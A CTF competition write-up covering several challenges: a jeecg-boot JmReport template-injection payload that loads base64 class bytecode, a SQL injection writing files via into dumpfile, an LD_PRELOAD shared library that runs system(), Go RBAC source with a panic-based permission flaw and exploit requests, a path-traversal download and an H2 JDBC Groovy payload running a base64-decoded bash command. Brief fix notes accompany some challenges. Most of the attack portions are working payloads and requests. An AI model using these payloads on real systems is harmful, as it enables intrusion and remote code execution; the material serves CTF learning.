Day 1

web01

jeecg-boot's CVE. I got stuck on it for a long time and only came back to write this challenge at the very end; by the time I got into the intranet there were only ten-odd minutes left, so there was basically no time to work on it. A bit of a pity.

That said, was it really not hung? The container hadn't even finished starting after 2 minutes and someone had already solved the challenge. Unreal.

POST /jmreport/queryFieldBySql?token=1 HTTP/1.1
Host: 8.145.34.157:8081
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/json
Content-Length: 18466

{"sql":"call${\"freemarker.template.utility.ObjectConstructor\"?new()(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval(\"classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}catch(e){clsString=classLoader.loadClass('java.lang.String');bytecodeBase64='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';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};#{1};\")}","dbSource":"","type":"0"}

The first box has MySQL, Redis and so on.

Intranet

On the intranet there is a Windows Server running Apache with anonymous FTP access that allows uploading and downloading files, so a .htaccess can be modified:

<FilesMatch "\.php$">
    SetHandler application/x-httpd-php
</FilesMatch>

In fact it is not PHP parsing here but CGI parsing; for the detailed writeup see this site's other post on 春秋云境 finance.

There is also a box with an Ollama CVE.

There was no time left to look at the rest.

hardPHP

This challenge is quite interesting.

Roughly, you are given a SQL injection point, but the password you enter has to match the password returned by the database query.

So use dumpfile and load_file: the first injection writes the expression of the second query into a file, and the second query reads the file's content back, so that the content and the expression match.

'union/**/select/**/'\'union/**/select/**/load_file(\'/tmp/222\')/**/union/**/select\''/**/into/**/dumpfile/**/'/tmp/222
'union/**/select/**/load_file('/tmp/222')/**/union/**/select'


After that, system("ls") is executed in admin.php; the vulnerable spot is:

<?php
foreach ($_REQUEST['env'] as $key => $value) {
    putenv("$key=$value");
}

Of course there is an enormous amount of filtering in there; leaving that aside, by this point it is pretty clear: inject an environment variable via LD_PRELOAD, LD_PRELOAD=/tmp/xxx

/tmp/xxx is the malicious .so file we upload.

Remember how we logged in earlier? This database allows dumpfile, so we can just write the .so file directly:

'union/**/select/**/unhex('这里是你的 hex 编码后的数据')/**/into/**/dumpfile/**/'/tmp/xxx

Build the .so with gcc: gcc -shared -fPIC -o preload.so preload.c

#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* Runs when the library is loaded via LD_PRELOAD, before main(). */
__attribute__ ((__constructor__)) void preload (void){
	unsetenv("LD_PRELOAD"); /* so the child spawned by system() is not preloaded again */
	system("cat /f1ag");
}

Finally, RCE achieved.

Day 2

rbac

package main

import (
	"errors"
	"os"
	"path/filepath"
	"strings"

	"github.com/gin-gonic/gin"
)

var RBACList = make(map[string]int)

type ResTemplate struct {
	Success bool
	Data    any
}

type ExecStruct struct {
	File      []string
	Directory []string
	Pwd       []string
	Flag      []string
	FuncName  string
	Param     string
}

func main() {
	r := gin.Default()
	initRBAC()
	r.GET("/", func(c *gin.Context) {
		htmlContent, err := os.ReadFile("index.html")
		if err != nil {
			c.String(400, "Error loading HTML file")
			return
		}

		c.Writer.Write(htmlContent)
	})

	r.GET("/getCurrentRBAC", func(c *gin.Context) {
		var response ResTemplate
		if RBACList["rbac:read"] == 1 {
			response = ResTemplate{
				Success: true,
				Data:    RBACList,
			}
			c.JSON(200, response)
		} else {
			response = ResTemplate{
				Success: false,
			}
			c.JSON(403, response)

		}

	})

	r.POST("/execSysFunc", func(c *gin.Context) {
		var execStruct ExecStruct
		var response ResTemplate
		err := c.ShouldBindJSON(&execStruct)
		if err != nil {
			response = ResTemplate{
				Success: false,
				Data:    map[string]string{"error": err.Error()},
			}
			c.JSON(400, response)
		}

		// permission grant
		RBACToGrant := make(map[string]int)
		var value string
		maxDeep := 0

		if execStruct.Directory != nil {
			for _, value = range execStruct.Directory {
				if maxDeep < 8 {
					RBACToGrant["directory:"+value] = 1
					maxDeep++
				} else {
					break
				}

			}
		}
		if execStruct.Flag != nil {
			for _, value = range execStruct.Flag {
				if maxDeep < 8 {
					RBACToGrant["flag:"+value] = 1
					maxDeep++
				} else {
					break
				}
			}
		}
		if execStruct.Pwd != nil {
			for _, value = range execStruct.Pwd {
				if maxDeep < 8 {
					RBACToGrant["pwd:"+value] = 1
					maxDeep++
				} else {
					break
				}

			}
		}

		if execStruct.File != nil {

			for _, value = range execStruct.File {
				// Grant temporary file:return permissions
				if value == "return" && RBACList["rbac:change_return"] != 1 {
					if maxDeep < 5 {
						RBACToGrant["rbac:change_return:1"] = 1
						RBACToGrant["file:"+value] = 1
						RBACToGrant["rbac:change_return:0"] = 1
						maxDeep += 3
					} else {
						break
					}

				} else {
					if maxDeep < 8 {
						RBACToGrant["file:"+value] = 1
						maxDeep++
					} else {
						break
					}

				}

			}
		}
		updateRBAC(RBACToGrant)
		result, err := execCommand(execStruct.FuncName, execStruct.Param)
		if err != nil {
			response = ResTemplate{
				Success: false,
				Data:    map[string]string{"error": err.Error()},
			}
			c.JSON(400, response)

		} else {
			response = ResTemplate{
				Success: true,
				Data:    map[string]string{"result": result},
			}
			initRBAC()
			c.JSON(200, response)
		}

	})
	r.Run(":80")
}

func initRBAC() {
	RBACList = make(map[string]int)
	RBACList["file:read"] = 0
	RBACList["file:return"] = 0
	RBACList["flag:read"] = 0
	RBACList["flag:return"] = 0
	RBACList["pwd:read"] = 0
	RBACList["directory:read"] = 0
	RBACList["directory:return"] = 0
	RBACList["rbac:read"] = 1
	RBACList["rbac:change_read"] = 1
	RBACList["rbac:change_return"] = 0

}

func updateRBAC(RBACToGrant map[string]int) {
	for key, value := range RBACToGrant {
		if strings.HasSuffix(key, ":read") {
			if RBACList["rbac:change_read"] == 1 {
				RBACList[key] = value
			}
		} else if strings.HasSuffix(key, ":return") {
			if RBACList["rbac:change_return"] == 1 {
				RBACList[key] = value
			}
		} else if key == "rbac:change_return:1" {
			RBACList["rbac:change_return"] = 1

		} else if key == "rbac:change_return:0" {
			RBACList["rbac:change_return"] = 0

		} else {
			RBACList[key] = value
		}

	}
}

func execCommand(funcName string, param string) (string, error) {

	if funcName == "getPwd" {
		if RBACList["pwd:read"] == 1 {
			pwd, err := os.Getwd()
			return pwd, err

		} else {
			return "No Permission", nil
		}
	} else if funcName == "getDirectory" {
		// read directory
		if RBACList["directory:read"] == 1 {
			var fileNames []string
			err := filepath.Walk(param, func(path string, info os.FileInfo, err error) error {
				fileNames = append(fileNames, info.Name())
				return nil
			})
			if err != nil {
				return "error", err
			}
			directoryFiles := strings.Join(fileNames, " ")
			if RBACList["directory:return"] == 1 {
				return directoryFiles, nil
			} else {
				return "the directory " + param + " exists", nil
			}

		} else {
			return "No Permission", nil
		}

	} else if funcName == "getFile" {
		// read file
		if RBACList["file:read"] == 1 {
			if strings.Contains(param, "flag") {
				if RBACList["flag:read"] != 1 {
					return "No Permission", nil
				}

			}
			data, err := os.ReadFile(param)
			if err != nil {
				return "file:"+param+" doesn't exist", nil
			}
			content := string(data)
			if RBACList["file:return"] == 0 {
				return "the file " + param + " exists", nil
			} else if RBACList["file:return"] == 1 && !strings.Contains(param, "flag") {
				return content, nil
			} else if RBACList["file:return"] == 1 && strings.Contains(param, "flag") && RBACList["flag:return"] == 1 {
				return content, nil
			} else {
				return "the file " + param + " exists", nil
			}

		} else {
			return "No Permission", nil
		}
	} else {
		return "No such func", errors.New("No such func")
	}
}

The key point is when initRBAC() is called. If Directory is given a non-existent path, filepath.Walk invokes the callback with a nil info and a non-nil err, the callback ignores err and calls info.Name(), and the handler panics; initRBAC() is only reached on the success path, so whenever a request returns err or panics, the permissions granted by that request are kept for the next one.

		if err != nil {
			response = ResTemplate{
				Success: false,
				Data:    map[string]string{"error": err.Error()},
			}
			c.JSON(400, response)

		} else {
			response = ResTemplate{
				Success: true,
				Data:    map[string]string{"result": result},
			}
			initRBAC()
			c.JSON(200, response)
		}

attack

Start by viewing the current RBAC permission list.

Construct the requests.

Request 1

POST /execSysFunc HTTP/2
Host: eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80
Content-Length: 138
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: */*
Origin: https://eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"File":["read","return"],"Directory":["read","return"],"Pwd":[],"Flag":["read"],"FuncName":"getDirectory","Param":"/tmp/zxx"}

Note here: because for range over a map does not iterate in insertion order (add a log line and you will see), what actually happens is that rbac:change_return:0 is processed first and rbac:change_return:1 afterwards; and since we triggered a panic, we can then set any return permission we like.

current kv: file:return : 1
current kv: rbac:change_return:0 : 1
current kv: directory:read : 1
current kv: flag:read : 1
current kv: file:read : 1
current kv: rbac:change_return:1 : 1

In short, the first request makes rbac:change_return:1 get iterated after rbac:change_return:0, so that in the err or panic case the value of rbac:change_return stays 1 from then on.

Request 2

POST /execSysFunc HTTP/2
Host: eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80
Content-Length: 116
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: */*
Origin: https://eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"File":["return"],"Directory":[],"Pwd":[],"Flag":["return"],"FuncName":"getDirectory","Param":"/tmp/zxx"}

Request 3

POST /execSysFunc HTTP/2
Host: eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80
Content-Length: 88
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: */*
Origin: https://eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"File":[],"Directory":[],"Pwd":[],"Flag":[],"FuncName":"getFile","Param":"/flag"}

fix

Fix it by inspection.
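A concrete version of that fix, added here as an example rather than the challenge's own code: permissions become per-request state instead of a global map, the grant order of updateRBAC is made deterministic, and the Walk callback checks its error so a missing directory returns an error instead of panicking. The names Perms, newPerms, applyGrants and listDir are this example's own.

```go
package main

import (
	"os"
	"path/filepath"
	"strings"
)

// Perms is per-request state, not a global like the challenge's RBACList, so a failed or panicking request leaves nothing behind.
type Perms map[string]int

func newPerms() Perms {
	return Perms{"file:read": 0, "file:return": 0, "flag:read": 0, "flag:return": 0, "directory:read": 0, "rbac:change_read": 1, "rbac:change_return": 0}
}

// applyGrants is updateRBAC with a fixed order (open change_return first, close it last), independent of map iteration order.
func (p Perms) applyGrants(grants map[string]int) {
	if grants["rbac:change_return:1"] == 1 {
		p["rbac:change_return"] = 1
	}
	for key, v := range grants {
		if strings.HasSuffix(key, ":read") && p["rbac:change_read"] == 1 ||
			strings.HasSuffix(key, ":return") && p["rbac:change_return"] == 1 {
			p[key] = v
		}
	}
	if grants["rbac:change_return:0"] == 1 {
		p["rbac:change_return"] = 0
	}
}

// listDir is getDirectory's walk with the missing error check: a missing path returns an error instead of panicking on nil info.
func listDir(dir string) ([]string, error) {
	var names []string
	err := filepath.Walk(dir, func(_ string, info os.FileInfo, err error) error {
		if err != nil {
			return err
		}
		names = append(names, info.Name())
		return nil
	})
	return names, err
}

func main() { // one request; a second request would start from newPerms() again
	p := newPerms()
	p.applyGrants(map[string]int{"rbac:change_return:1": 1, "file:return": 1, "rbac:change_return:0": 1})
	_, err := listDir("/tmp/does-not-exist")
	println(p["file:return"], p["rbac:change_return"], err != nil)
}
```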

security_rasp

Baidu's OpenRASP, with a deserialization entry point; the intended attack is presumably a blacklist bypass.

attack

No idea, I hate Java.

fix

Change every return to block.

OTA

attack

wget url/static/%2f/%2f/%2e%2e/%2f/%2f/%2e%2e/opt/ota.jar to download the file and get the jwtkey, then forge a session, execute commands, and then attack Groovy.

{
    "jdbcUrl": "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS T5 AS '@groovy.transform.ASTTest(value={ assert java.lang.Runtime.getRuntime().exec(\"bash -c {echo,cmd}|{base64,-d}|{bash,-i}\")})def x'",
    "username": "sa",
    "password": "11111111"
}

fix

Path traversal; update spring-parent from 3.3.3 to 3.3.4.